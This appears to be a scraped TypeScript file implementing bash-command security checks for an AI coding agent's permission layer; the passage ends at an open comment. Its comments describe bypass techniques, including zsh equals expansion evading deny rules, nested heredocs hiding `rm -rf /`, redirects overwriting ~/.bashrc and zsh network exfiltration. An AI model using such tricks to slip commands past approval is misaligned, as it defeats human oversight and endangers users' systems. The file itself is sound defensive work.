2593 lines
100 KiB
TypeScript
2593 lines
100 KiB
TypeScript
import { logEvent } from 'src/services/analytics/index.js'
|
|
import { extractHeredocs } from '../../utils/bash/heredoc.js'
|
|
import { ParsedCommand } from '../../utils/bash/ParsedCommand.js'
|
|
import {
|
|
hasMalformedTokens,
|
|
hasShellQuoteSingleQuoteBug,
|
|
tryParseShellCommand,
|
|
} from '../../utils/bash/shellQuote.js'
|
|
import type { TreeSitterAnalysis } from '../../utils/bash/treeSitterAnalysis.js'
|
|
import type { PermissionResult } from '../../utils/permissions/PermissionResult.js'
|
|
|
|
// Cheap pre-filter used before any detailed heredoc analysis: matches a `$(`
// followed later ON THE SAME LINE by `<<` (`.` does not match newlines).
// It only signals "a heredoc may be opened inside a command substitution";
// it says nothing about whether that heredoc is safe.
const HEREDOC_IN_SUBSTITUTION = /\$\(.*<</
|
|
|
|
// Substitution / expansion syntaxes, each paired with a human-readable label.
// Backticks are intentionally NOT listed: validateDangerousPatterns handles
// them separately so it can tell escaped backticks from unescaped ones.
const COMMAND_SUBSTITUTION_PATTERNS = [
  // --- Process substitution -------------------------------------------------
  {
    pattern: /<\(/,
    message: 'process substitution <()',
  },
  {
    pattern: />\(/,
    message: 'process substitution >()',
  },
  {
    pattern: /=\(/,
    message: 'Zsh process substitution =()',
  },

  // --- Zsh EQUALS expansion ---------------------------------------------------
  // A word-initial `=cmd` expands to $(which cmd), so `=curl evil.com` becomes
  // `/usr/bin/curl evil.com`. The parser sees `=curl` (not `curl`) as the base
  // command, which would slip past Bash(curl:*) deny rules. The pattern only
  // fires for `=` at a word start followed by a command-name character, so
  // ordinary `VAR=val` assignments are not matched.
  {
    pattern: /(?:^|[\s;&|])=[a-zA-Z_]/,
    message: 'Zsh equals expansion (=cmd)',
  },

  // --- Dollar-introduced expansions -------------------------------------------
  {
    pattern: /\$\(/,
    message: '$() command substitution',
  },
  {
    pattern: /\$\{/,
    message: '${} parameter substitution',
  },
  {
    pattern: /\$\[/,
    message: '$[] legacy arithmetic expansion',
  },

  // --- Zsh-specific syntax ------------------------------------------------------
  {
    pattern: /~\[/,
    message: 'Zsh-style parameter expansion',
  },
  {
    pattern: /\(e:/,
    message: 'Zsh-style glob qualifiers',
  },
  {
    pattern: /\(\+/,
    message: 'Zsh glob qualifier with command execution',
  },
  {
    pattern: /\}\s*always\s*\{/,
    message: 'Zsh always block (try/always construct)',
  },

  // --- Defense in depth ---------------------------------------------------------
  // PowerShell is not an execution target today; the comment opener is blocked
  // anyway in case a future change introduces PowerShell execution.
  {
    pattern: /<#/,
    message: 'PowerShell comment syntax',
  },
]
|
|
|
|
// Zsh-only commands that can sidestep the other security checks. Per the
// original design notes, membership is tested against the base command (the
// first word) of each command segment.
const ZSH_DANGEROUS_COMMANDS = new Set([
  // Gateway to the module-based attacks below: zsh/mapfile (invisible file I/O
  // through array assignment), zsh/system (sysopen/syswrite two-step file
  // access), zsh/zpty (pseudo-terminal command execution), zsh/net/tcp
  // (network exfiltration via ztcp) and zsh/files (builtin rm/mv/ln/chmod that
  // bypass checks on the external binaries).
  'zmodload',

  // `emulate -c` evaluates arbitrary code, i.e. it is an eval equivalent.
  'emulate',

  // Builtins provided by loadable modules. They need zmodload first, but are
  // blocked as well in case zmodload is bypassed or the module is pre-loaded.

  // zsh/system
  'sysopen', // opens files with fine-grained control
  'sysread', // reads from file descriptors
  'syswrite', // writes to file descriptors
  'sysseek', // seeks on file descriptors

  // zsh/zpty, zsh/net/tcp, zsh/net/socket
  'zpty', // executes commands on pseudo-terminals
  'ztcp', // creates TCP connections (exfiltration)
  'zsocket', // creates Unix/TCP sockets

  // zsh/mapfile: not a command, but the associative array that zmodload sets up
  'mapfile',

  // zsh/files builtin replacements for the coreutils binaries
  'zf_rm',
  'zf_mv',
  'zf_ln',
  'zf_chmod',
  'zf_chown',
  'zf_mkdir',
  'zf_rmdir',
  'zf_chgrp',
])
|
|
|
|
// Stable numeric ids for each bash security check. Validators in this file
// send them as `checkId` in 'tengu_bash_security_check_triggered' events so
// that no descriptive strings have to be logged. Values are never reused.
const BASH_SECURITY_CHECK_IDS = {
  // Command shape
  INCOMPLETE_COMMANDS: 1,

  // jq
  JQ_SYSTEM_FUNCTION: 2,
  JQ_FILE_ARGUMENTS: 3,

  // Flags, metacharacters, variables, newlines
  OBFUSCATED_FLAGS: 4,
  SHELL_METACHARACTERS: 5,
  DANGEROUS_VARIABLES: 6,
  NEWLINES: 7,

  // Dangerous patterns
  DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION: 8,
  DANGEROUS_PATTERNS_INPUT_REDIRECTION: 9,
  DANGEROUS_PATTERNS_OUTPUT_REDIRECTION: 10,

  // Injection and parser-differential checks
  IFS_INJECTION: 11,
  GIT_COMMIT_SUBSTITUTION: 12,
  PROC_ENVIRON_ACCESS: 13,
  MALFORMED_TOKEN_INJECTION: 14,
  BACKSLASH_ESCAPED_WHITESPACE: 15,
  BRACE_EXPANSION: 16,
  CONTROL_CHARACTERS: 17,
  UNICODE_WHITESPACE: 18,
  MID_WORD_HASH: 19,
  ZSH_DANGEROUS_COMMANDS: 20,
  BACKSLASH_ESCAPED_OPERATORS: 21,
  COMMENT_QUOTE_DESYNC: 22,
  QUOTED_NEWLINE: 23,
} as const
|
|
|
|
/**
 * Pre-computed views of one command, handed to every validator so each can
 * pick the representation it needs without re-parsing.
 */
type ValidationContext = {
  /** The command text exactly as received. */
  originalCommand: string

  /** Base command word (compared against names such as 'git' and 'jq'). */
  baseCommand: string

  // NOTE(review): presumably QuoteExtraction.withDoubleQuotes — confirm where
  // the context is constructed.
  unquotedContent: string

  // NOTE(review): presumably QuoteExtraction.fullyUnquoted after
  // stripSafeRedirections — confirm where the context is constructed.
  fullyUnquotedContent: string

  /**
   * The fully-unquoted text BEFORE stripSafeRedirections ran. Used by
   * validateBraceExpansion: redirection stripping can create backslash
   * adjacencies that would otherwise cause false negatives.
   */
  fullyUnquotedPreStrip: string

  /**
   * Same as fullyUnquotedPreStrip except that the quote characters themselves
   * (' and ") are kept, e.g. `echo 'x'#` becomes `echo ''#`, so adjacency of a
   * quote to `#` stays visible.
   */
  unquotedKeepQuoteChars: string

  /**
   * Optional tree-sitter analysis. Validators may use it for more accurate
   * results when present and fall back to regex checks otherwise.
   */
  treeSitter?: TreeSitterAnalysis | null
}
|
|
|
|
/** The three projections of a command produced by extractQuotedContent. */
type QuoteExtraction = {
  /** Everything outside single quotes (double-quoted content is retained). */
  withDoubleQuotes: string

  /** Only the text that is outside both single and double quotes. */
  fullyUnquoted: string

  /**
   * Like fullyUnquoted, but the quote delimiters (' and ") are kept while the
   * quoted content is dropped. validateMidWordHash relies on this to notice a
   * `#` that directly follows a quote (e.g. `'x'#`), an adjacency that plain
   * quote stripping would hide.
   */
  unquotedKeepQuoteChars: string
}
|
|
|
|
/**
 * Walks `command` once, tracking shell quote state, and produces three
 * filtered copies of it (see QuoteExtraction).
 *
 * Rules applied per character:
 * - A backslash outside single quotes escapes the next character; both the
 *   backslash and the escaped character are copied like ordinary text.
 * - `'` toggles single-quote state unless inside double quotes; `"` toggles
 *   double-quote state unless inside single quotes. Both delimiters are always
 *   recorded in `unquotedKeepQuoteChars`.
 * - Ordinary text goes to `withDoubleQuotes` when outside single quotes, and to
 *   `fullyUnquoted` / `unquotedKeepQuoteChars` when outside all quotes.
 *
 * @param command - Raw command text.
 * @param isJq - When true, a `"` is additionally treated as ordinary text after
 *   toggling state, so double-quote characters reach the extraction output.
 * @returns The three projections of the command.
 */
function extractQuotedContent(command: string, isJq = false): QuoteExtraction {
  let withDoubleQuotes = ''
  let fullyUnquoted = ''
  let unquotedKeepQuoteChars = ''

  let insideSingle = false
  let insideDouble = false
  let pendingEscape = false

  // Copies one character into whichever projections the current quote state
  // permits.
  const emit = (ch: string): void => {
    if (insideSingle) return
    withDoubleQuotes += ch
    if (insideDouble) return
    fullyUnquoted += ch
    unquotedKeepQuoteChars += ch
  }

  for (const ch of command) {
    if (pendingEscape) {
      // Character following a backslash: literal, never a quote toggle.
      pendingEscape = false
      emit(ch)
      continue
    }

    if (ch === '\\' && !insideSingle) {
      pendingEscape = true
      emit(ch)
      continue
    }

    if (ch === "'" && !insideDouble) {
      insideSingle = !insideSingle
      unquotedKeepQuoteChars += ch
      continue
    }

    if (ch === '"' && !insideSingle) {
      insideDouble = !insideDouble
      unquotedKeepQuoteChars += ch
      // For jq the quote also falls through to the generic copy below so the
      // quoted program text is analyzed together with its delimiters.
      if (!isJq) continue
    }

    emit(ch)
  }

  return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
}
|
|
|
|
/**
 * Removes redirections considered harmless (`2>&1`, `> /dev/null` with an
 * optional 0/1/2 descriptor, `< /dev/null`) so later redirection checks do not
 * trip on them.
 *
 * SECURITY: every pattern MUST end with the boundary lookahead `(?=\s|$)`.
 * Without it `> /dev/nullo` would match `/dev/null` as a prefix and be reduced
 * to `o`, turning `echo hi > /dev/nullo` into `echo hi o`. The redirection
 * validator would then see no `>` and let a real file write through. The main
 * permission flow re-validates the original command, but callers that rely on
 * the read-only check alone (speculation) would be exposed.
 *
 * @param content - Command text, normally already quote-stripped.
 * @returns `content` with the safe redirections removed.
 */
function stripSafeRedirections(content: string): string {
  // Applied in this exact order; each replacement sees the previous result.
  const safeRedirections = [
    /\s+2\s*>&\s*1(?=\s|$)/g,
    /[012]?\s*>\s*\/dev\/null(?=\s|$)/g,
    /\s*<\s*\/dev\/null(?=\s|$)/g,
  ]

  return safeRedirections.reduce(
    (text, redirection) => text.replace(redirection, ''),
    content,
  )
}
|
|
|
|
/**
 * Reports whether `content` contains `char` in a position where it is not
 * escaped by a preceding backslash. A backslash together with the character
 * after it is treated as one escape sequence and skipped.
 *
 * IMPORTANT: single characters only. Extending this to multi-character needles
 * needs EXTREME care: shell ANSI-C quoting ($'\n', $'\x41', $'\u0041') can
 * encode arbitrary characters and strings in ways that are very hard to parse
 * correctly, and a mistake here lets attackers slip past security checks.
 *
 * @param content - Text to scan (typically output of extractQuotedContent)
 * @param char - The single character to look for (e.g., '`')
 * @returns true when an unescaped occurrence exists, false otherwise
 * @throws Error when `char` is not exactly one character long
 *
 * Examples:
 *   hasUnescapedChar("test \`safe\`", '`') → false (both backticks escaped)
 *   hasUnescapedChar("test `dangerous`", '`') → true (plain backticks)
 *   hasUnescapedChar("test\\`date`", '`') → true (escaped backslash, then a live backtick)
 */
function hasUnescapedChar(content: string, char: string): boolean {
  if (char.length !== 1) {
    throw new Error('hasUnescapedChar only works with single characters')
  }

  const lastIndex = content.length - 1
  for (let pos = 0; pos <= lastIndex; pos++) {
    const current = content[pos]

    // Backslash with a character after it: skip the pair as one escape
    // sequence. A trailing lone backslash is examined like any other char.
    if (current === '\\' && pos < lastIndex) {
      pos++
      continue
    }

    if (current === char) return true
  }

  return false
}
|
|
|
|
/**
 * Early validator: a command that is empty or whitespace-only is allowed
 * outright; anything else is passed on to the next validator.
 *
 * @param context - Validation context; only `originalCommand` is read.
 * @returns `allow` (echoing the original command) for blank input, otherwise
 *   `passthrough`.
 */
function validateEmpty(context: ValidationContext): PermissionResult {
  const { originalCommand } = context
  const hasContent = originalCommand.trim().length > 0

  if (hasContent) {
    return { behavior: 'passthrough', message: 'Command is not empty' }
  }

  return {
    behavior: 'allow',
    updatedInput: { command: originalCommand },
    decisionReason: { type: 'other', reason: 'Empty command is safe' },
  }
}
|
|
|
|
/**
 * Flags commands that look like a fragment of a larger command rather than a
 * complete one. Three shapes are checked, in this order, and the first hit
 * wins:
 *   1. leading whitespace that contains a tab,
 *   2. first non-blank character is `-` (looks like bare flags),
 *   3. command starts with an operator: `&&`, `||`, `;`, `>`, `>>` or `<`.
 * Each hit is reported through logEvent with the INCOMPLETE_COMMANDS check id
 * and the sub-id shown above.
 *
 * @param context - Validation context; only `originalCommand` is read.
 * @returns `ask` with an explanatory message on a hit, otherwise `passthrough`.
 */
function validateIncompleteCommands(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context
  const trimmed = originalCommand.trim()

  const fragmentRules: Array<{
    subId: number
    matches: () => boolean
    message: string
  }> = [
    {
      subId: 1,
      matches: () => /^\s*\t/.test(originalCommand),
      message: 'Command appears to be an incomplete fragment (starts with tab)',
    },
    {
      subId: 2,
      matches: () => trimmed.startsWith('-'),
      message:
        'Command appears to be an incomplete fragment (starts with flags)',
    },
    {
      subId: 3,
      matches: () => /^\s*(&&|\|\||;|>>?|<)/.test(originalCommand),
      message:
        'Command appears to be a continuation line (starts with operator)',
    },
  ]

  for (const rule of fragmentRules) {
    if (!rule.matches()) continue
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,
      subId: rule.subId,
    })
    return { behavior: 'ask', message: rule.message }
  }

  return { behavior: 'passthrough', message: 'Command appears complete' }
}
|
|
|
|
/**
 * Decides whether a command consists of a "safe" heredoc-in-substitution
 * pattern that may skip the generic $() validator.
 *
 * This is an EARLY-ALLOW path: a `true` result lets the caller approve the
 * command without running the remaining validators, so the check has to be
 * PROVABLY safe rather than "probably safe".
 *
 * The only accepted shape is:
 *   [prefix] $(cat <<'DELIM'\n
 *   [body lines]\n
 *   DELIM\n
 *   ) [suffix]
 *
 * Requirements:
 * - The delimiter is single-quoted ('DELIM') or backslash-escaped (\DELIM), so
 *   the body is literal text with no expansion.
 * - The closing delimiter stands on a line BY ITSELF (followed by `)` at the
 *   start of the next line), or is followed on its own line only by optional
 *   blanks and `)` (the inline `$(cat <<'EOF'\n...\nEOF)` form).
 * - The closing delimiter is the FIRST such line, exactly as bash closes a
 *   heredoc; later look-alikes are never used.
 * - Non-whitespace text precedes the first `$(` whenever anything remains
 *   after stripping, i.e. the substitution is in argument position. Otherwise
 *   the heredoc body would become the command name with [suffix] as its args.
 * - The command with all heredocs stripped contains only allowlisted
 *   characters and itself passes bashCommandIsSafe_DEPRECATED.
 *
 * Closing lines are located with LINE-BASED matching instead of a lazy
 * any-character regex, which could skip the first delimiter and hide injected
 * commands between two delimiters.
 *
 * @param command - The full original command text.
 * @returns true only when every condition above holds.
 */
function isSafeHeredoc(command: string): boolean {
  if (!HEREDOC_IN_SUBSTITUTION.test(command)) return false

  // SECURITY: [ \t] (not \s) between << and the delimiter. \s would match
  // newlines, but bash needs the delimiter word on the same line as <<, so
  // matching across lines could accept syntax bash rejects. Repeated quotes
  // (''EOF'') are tolerated because splitCommand may mangle quotes.
  const openerPattern =
    /\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g

  type Opener = {
    start: number
    operatorEnd: number
    delimiter: string
    isDash: boolean
  }
  type Span = { start: number; end: number }

  const openers: Opener[] = []
  for (
    let found = openerPattern.exec(command);
    found !== null;
    found = openerPattern.exec(command)
  ) {
    const delimiter = found[2] || found[3]
    if (!delimiter) continue
    openers.push({
      start: found.index,
      operatorEnd: found.index + found[0].length,
      delimiter,
      isDash: found[1] === '-',
    })
  }
  if (openers.length === 0) return false

  // Finds the `)` that closes the substitution for one heredoc body, scanning
  // lines top-down and stopping at the FIRST closing line. Returns the line
  // index and column (in the raw, un-stripped line) of that `)`, or null when
  // the body does not end in one of the two accepted forms.
  const locateCloseParen = (
    bodyLines: string[],
    delimiter: string,
    isDash: boolean,
  ): { lineIdx: number; colIdx: number } | null => {
    for (let idx = 0; idx < bodyLines.length; idx++) {
      const rawLine = bodyLines[idx]!
      // For <<-, leading tabs are ignored when comparing with the delimiter.
      const leadingTabs = isDash ? (rawLine.match(/^\t*/)?.[0] ?? '') : ''
      const line = rawLine.slice(leadingTabs.length)

      // Form 1: delimiter alone on its line; `)` must open the NEXT line with
      // nothing but blanks before it.
      if (line === delimiter) {
        const following = bodyLines[idx + 1]
        if (following === undefined) return null
        const paren = following.match(/^([ \t]*)\)/)
        if (!paren) return null
        return { lineIdx: idx + 1, colIdx: paren[1]!.length }
      }

      if (!line.startsWith(delimiter)) continue

      // Form 2: delimiter, optional blanks, then `)` on the same line (bash's
      // PST_EOFTOKEN closes heredoc and substitution together).
      const afterDelim = line.slice(delimiter.length)
      const paren = afterDelim.match(/^([ \t]*)\)/)
      if (paren) {
        return {
          lineIdx: idx,
          colIdx: leadingTabs.length + delimiter.length + paren[1]!.length,
        }
      }

      // Delimiter followed directly by another shell metacharacter: inside
      // $() bash might close early here, so the pattern is ambiguous. Reject.
      if (/^[)}`|&;(<>]/.test(afterDelim)) return null
      // Otherwise the line merely begins with the delimiter text; keep going.
    }
    return null
  }

  const verified: Span[] = []
  for (const { start, operatorEnd, delimiter, isDash } of openers) {
    // The opening line may hold only blanks after the delimiter. Anything
    // else (e.g. `; rm -rf /`) means this is not the simple safe form.
    const newlineAt = command.indexOf('\n', operatorEnd)
    if (newlineAt === -1) return false
    if (!/^[ \t]*$/.test(command.slice(operatorEnd, newlineAt))) return false

    const bodyStart = newlineAt + 1
    const bodyLines = command.slice(bodyStart).split('\n')

    const close = locateCloseParen(bodyLines, delimiter, isDash)
    if (close === null) return false

    // Absolute offset one past the `)`: every earlier line plus its newline,
    // then the column of `)` on its own line, then the `)` itself.
    const precedingLength = bodyLines
      .slice(0, close.lineIdx)
      .reduce((total, text) => total + text.length + 1, 0)
    verified.push({
      start,
      end: bodyStart + precedingLength + close.colIdx + 1,
    })
  }

  // SECURITY: reject nested matches. The opener regex works on RAW TEXT and
  // does not know that the body of a quoted heredoc is literal, so a
  // `$(cat <<'B'` inside the body of `<<'A'` is matched too. Stripping nested
  // spans would leave the outer span's `end` stale and silently drop suffix
  // text (e.g. `; rm -rf /`). No legitimate command looks like this, so bail.
  const hasNestedSpan = verified.some(outer =>
    verified.some(
      inner =>
        inner !== outer &&
        inner.start > outer.start &&
        inner.start < outer.end,
    ),
  )
  if (hasNestedSpan) return false

  // Remove the verified spans back-to-front so earlier offsets stay valid.
  const remaining = [...verified]
    .sort((a, b) => b.start - a.start)
    .reduce(
      (text, span) => text.slice(0, span.start) + text.slice(span.end),
      command,
    )

  // SECURITY: a $() in COMMAND-NAME position executes its output, with any
  // trailing text as arguments:
  //   $(cat <<'EOF'\nchmod\nEOF\n) 777 /etc/shadow  →  chmod 777 /etc/shadow
  // So when anything is left after stripping, the original command must have
  // non-blank text before its first heredoc substitution.
  if (remaining.trim().length > 0) {
    const firstHeredocStart = Math.min(...verified.map(span => span.start))
    if (command.slice(0, firstHeredocStart).trim().length === 0) return false
  }

  // The leftover text may contain only command names, arguments, quotes and
  // ASCII space/tab. Operators (| & ;), expansions ($ ` { < >), newlines and
  // unicode whitespace (which \s would admit) all fail this allowlist.
  if (!/^[a-zA-Z0-9 \t"'.\-/_@=,:+~]*$/.test(remaining)) return false

  // SECURITY: the leftover text must also pass the full validator chain;
  // otherwise appending a safe heredoc to a dangerous command (e.g.
  // `zmodload zsh/system $(cat <<'EOF'\nx\nEOF\n)`) would bypass it. This
  // cannot recurse back here: `remaining` no longer contains `$(... <<`.
  return bashCommandIsSafe_DEPRECATED(remaining).behavior === 'passthrough'
}
|
|
|
|
/**
 * Detects well-formed `$(cat <<'DELIM' ... DELIM)` heredoc substitutions and
 * returns the command with each of them removed. Used by the pre-split gate
 * to strip safe heredocs and re-check what is left.
 *
 * A substitution is stripped only when:
 * - its `$(` is not preceded by a backslash,
 * - the delimiter is single-quoted or backslash-escaped,
 * - nothing but blanks follows the delimiter on the opening line, and
 * - the first body line that starts with the delimiter is either
 *   `DELIM[blanks])` or exactly `DELIM` followed by a line starting with
 *   `[blanks])`. For `<<-`, leading tabs are ignored when comparing.
 *
 * SECURITY: openers that start INSIDE an already accepted substitution are
 * ignored. The body of a quoted heredoc is literal text, so such an opener is
 * not a real heredoc, and recording it would create nested ranges. Stripping
 * nested ranges leaves the outer range's `end` pointing into an already
 * shortened string and silently drops the text after the outer `)`:
 *   echo $(cat <<'A'\n$(cat <<'B'\nx\nB\n)\nA\n) ; rm -rf /
 * used to come back as `echo `, hiding `; rm -rf /` from the re-check.
 *
 * @param command - The full command text.
 * @returns The command with every accepted substitution removed, or null when
 *   none was found.
 */
export function stripSafeHeredocSubstitutions(command: string): string | null {
  if (!HEREDOC_IN_SUBSTITUTION.test(command)) return null

  const heredocPattern =
    /\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g
  const closesSubstitution = /^[ \t]*\)/

  // Accepted ranges, in ascending order and guaranteed disjoint.
  const ranges: Array<{ start: number; end: number }> = []
  // One past the `)` of the most recently accepted range.
  let coveredUntil = 0

  let match: RegExpExecArray | null
  while ((match = heredocPattern.exec(command)) !== null) {
    const start = match.index
    // Literal text inside the body of an accepted heredoc, not a real opener.
    if (start < coveredUntil) continue
    // `\$(` is an escaped dollar sign, not a substitution.
    if (start > 0 && command[start - 1] === '\\') continue

    const delimiter = match[2] || match[3]
    if (!delimiter) continue
    const isDash = match[1] === '-'
    const operatorEnd = start + match[0].length

    // The opening line must end right after the delimiter (blanks allowed).
    const openLineEnd = command.indexOf('\n', operatorEnd)
    if (openLineEnd === -1) continue
    if (!/^[ \t]*$/.test(command.slice(operatorEnd, openLineEnd))) continue

    const bodyStart = openLineEnd + 1
    const bodyLines = command.slice(bodyStart).split('\n')

    // Absolute offset of the current body line, advanced as lines are passed.
    let lineStart = bodyStart
    for (let i = 0; i < bodyLines.length; i++) {
      const rawLine = bodyLines[i]!
      const line = isDash ? rawLine.replace(/^\t*/, '') : rawLine

      if (!line.startsWith(delimiter)) {
        lineStart += rawLine.length + 1 // +1 for the newline
        continue
      }

      // First line beginning with the delimiter decides the outcome; the
      // search never continues past it.
      const after = line.slice(delimiter.length)
      let closePos = -1
      if (closesSubstitution.test(after)) {
        // `DELIM)` form: the delimiter contains no `)`, so the first `)` on
        // this line is the closing one.
        closePos = command.indexOf(')', lineStart)
      } else if (after === '') {
        // `DELIM` alone: `)` must open the next line.
        const nextLine = bodyLines[i + 1]
        if (nextLine !== undefined && closesSubstitution.test(nextLine)) {
          closePos = command.indexOf(')', lineStart + rawLine.length + 1)
        }
      }

      if (closePos !== -1) {
        ranges.push({ start, end: closePos + 1 })
        coveredUntil = closePos + 1
      }
      break
    }
  }

  if (ranges.length === 0) return null

  // Ranges are ascending and disjoint, so the result is simply the text
  // between them, taken with offsets into the ORIGINAL command.
  let result = ''
  let cursor = 0
  for (const { start, end } of ranges) {
    result += command.slice(cursor, start)
    cursor = end
  }
  return result + command.slice(cursor)
}
|
|
|
|
/**
 * Detection-only variant of stripSafeHeredocSubstitutions: reports whether the
 * command contains at least one safe heredoc substitution, discarding the
 * stripped text.
 */
export function hasSafeHeredocSubstitution(command: string): boolean {
  const stripped = stripSafeHeredocSubstitutions(command)
  return stripped !== null
}
|
|
|
|
/**
 * Early validator for heredocs inside command substitutions. Commands without
 * a `$( ... <<` pattern are passed on untouched; commands for which
 * isSafeHeredoc holds are allowed outright; everything else is passed on to
 * the regular validators.
 *
 * @param context - Validation context; only `originalCommand` is read.
 * @returns `allow` for a verified safe heredoc substitution, otherwise
 *   `passthrough`.
 */
function validateSafeCommandSubstitution(
  context: ValidationContext,
): PermissionResult {
  const command = context.originalCommand

  const mayContainHeredoc = HEREDOC_IN_SUBSTITUTION.test(command)
  if (!mayContainHeredoc) {
    return { behavior: 'passthrough', message: 'No heredoc in substitution' }
  }

  if (!isSafeHeredoc(command)) {
    return {
      behavior: 'passthrough',
      message: 'Command substitution needs validation',
    }
  }

  return {
    behavior: 'allow',
    updatedInput: { command },
    decisionReason: {
      type: 'other',
      reason:
        'Safe command substitution: cat with quoted/escaped heredoc delimiter',
    },
  }
}
|
|
|
|
/**
 * Early validator for `git commit ... -m <quoted message>`.
 *
 * Returning `allow` from here is a POSITIVE ASSERTION that the whole command
 * is safe, so every doubtful case falls back to `passthrough` (let the main
 * validators decide) or `ask`:
 * - not a git commit, or any backslash present → passthrough
 * - double-quoted message containing `$(`, a backtick or `${` → ask
 * - text after the message containing shell operators, or an unquoted
 *   `<` / `>` → passthrough
 * - message starting with `-` → ask
 * - otherwise → allow
 *
 * @param context - Validation context; `originalCommand` and `baseCommand`
 *   are read.
 * @returns The permission decision described above.
 */
function validateGitCommit(context: ValidationContext): PermissionResult {
  const { originalCommand, baseCommand } = context

  const isGitCommit =
    baseCommand === 'git' && /^git\s+commit\s+/.test(originalCommand)
  if (!isGitCommit) {
    return { behavior: 'passthrough', message: 'Not a git commit' }
  }

  // SECURITY: backslashes can make the regex below misjudge quote boundaries
  // (e.g. `git commit -m "test\"msg" && evil`). Real commit messages almost
  // never contain them, so hand such commands to the full validator chain.
  if (originalCommand.includes('\\')) {
    return {
      behavior: 'passthrough',
      message: 'Git commit contains backslash, needs full validation',
    }
  }

  // SECURITY notes on the pattern:
  // - The lazy class before `-m` excludes shell metacharacters. A plain `.*?`
  //   would swallow `; curl evil.com ` in `git commit ; curl evil.com -m 'x'`,
  //   leave an empty remainder and let a compound command be allowed.
  // - `[ \t]+` (not `\s+`) separates the words: `\n` / `\r` are command
  //   separators in bash and must not count as whitespace here.
  // - `<` and `>` are excluded before `-m` (redirects); they may still occur
  //   in the remainder, e.g. `--author="Name <email>"`, and are checked there.
  const messageMatch = originalCommand.match(
    /^git[ \t]+commit[ \t]+[^;&|`$<>()\n\r]*?-m[ \t]+(["'])([\s\S]*?)\1(.*)$/,
  )
  if (!messageMatch) {
    return { behavior: 'passthrough', message: 'Git commit needs validation' }
  }

  const [, quote, messageContent, remainder] = messageMatch

  // Inside double quotes the shell still performs substitution.
  if (quote === '"' && messageContent && /\$\(|`|\$\{/.test(messageContent)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.GIT_COMMIT_SUBSTITUTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message: 'Git commit message contains command substitution patterns',
    }
  }

  if (remainder) {
    // SECURITY: operators after the message chain further commands
    // (`&& evil`, `; evil`, `| evil`, substitutions). Defer to the main
    // validators instead of allowing.
    if (/[;|&()`]|\$\(|\$\{/.test(remainder)) {
      return {
        behavior: 'passthrough',
        message: 'Git commit remainder contains shell metacharacters',
      }
    }

    // Drops everything between matching quotes. There is deliberately no
    // backslash handling: any command containing a backslash was already
    // sent to passthrough above, and without backslashes plain quote
    // toggling is exact.
    const outsideQuotes = (text: string): string => {
      let kept = ''
      let openQuote: string | null = null
      for (const c of text) {
        if (openQuote === null) {
          if (c === "'" || c === '"') openQuote = c
          else kept += c
        } else if (c === openQuote) {
          openQuote = null
        }
      }
      return kept
    }

    // SECURITY: a quoted `<`/`>` (email brackets in --author) is harmless, an
    // UNQUOTED one is a redirect. Allowing here would skip the redirection
    // validator, e.g. `git commit --allow-empty -m 'payload' > ~/.bashrc`
    // would overwrite ~/.bashrc with git output containing `payload`.
    if (/[<>]/.test(outsideQuotes(remainder))) {
      return {
        behavior: 'passthrough',
        message: 'Git commit remainder contains unquoted redirect operator',
      }
    }
  }

  // Hardening: a message that begins with a dash (e.g. `-m "---"`) may be an
  // attempt to smuggle something that looks like a flag.
  if (messageContent?.startsWith('-')) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
      subId: 5,
    })
    return {
      behavior: 'ask',
      message: 'Command contains quoted characters in flag names',
    }
  }

  return {
    behavior: 'allow',
    updatedInput: { command: originalCommand },
    decisionReason: {
      type: 'other',
      reason: 'Git commit with simple quoted message is allowed',
    },
  }
}
|
|
|
|
/**
 * Validator for `jq` invocations. Commands whose base command is not `jq` are
 * passed on unchanged.
 *
 * Two things trigger `ask`:
 * 1. a `system(` call anywhere in the command, and
 * 2. flags that make jq load a program, module or variable content from a
 *    file: -f / --from-file, -L / --library-path, --rawfile, --slurpfile.
 *
 * Plain file arguments are not flagged here; per the original design notes
 * they are left to path validation (readOnlyValidation.ts).
 *
 * SECURITY: jq lets short options be stacked (`-nf prog.jq`, `-rf prog.jq`)
 * and lets the -L path be attached (`-Llib`). The flag pattern therefore
 * matches `f` anywhere inside a short-option cluster and `-L` with or without
 * an attached value; matching only a standalone `-f` / `-L` missed those
 * spellings. The pattern is a strict superset of the previous one, so nothing
 * that used to be flagged is now passed.
 *
 * @param context - Validation context; `originalCommand` and `baseCommand`
 *   are read.
 * @returns `ask` for the dangerous cases above, otherwise `passthrough`.
 */
function validateJqCommand(context: ValidationContext): PermissionResult {
  const { originalCommand, baseCommand } = context

  if (baseCommand !== 'jq') {
    return { behavior: 'passthrough', message: 'Not jq' }
  }

  if (/\bsystem\s*\(/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.JQ_SYSTEM_FUNCTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'jq command contains system() function which executes arbitrary commands',
    }
  }

  // Everything after the leading `jq` (3 characters incl. the separator).
  const afterJq = originalCommand.substring(3).trim()

  // A flag must start the text or follow whitespace. Alternatives:
  //   -[A-Za-z]*f[A-Za-z]*\b  any short-option cluster containing `f`
  //   -L                      library path, separate or attached value
  //   --from-file / --rawfile / --slurpfile / --library-path
  const dangerousFlagPattern =
    /(?:^|\s)(?:-[A-Za-z]*f[A-Za-z]*\b|-L|--from-file|--rawfile|--slurpfile|--library-path)/

  if (dangerousFlagPattern.test(afterJq)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.JQ_FILE_ARGUMENTS,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'jq command contains dangerous flags that could execute code or read arbitrary files',
    }
  }

  return { behavior: 'passthrough', message: 'jq command is safe' }
}
|
|
|
|
/**
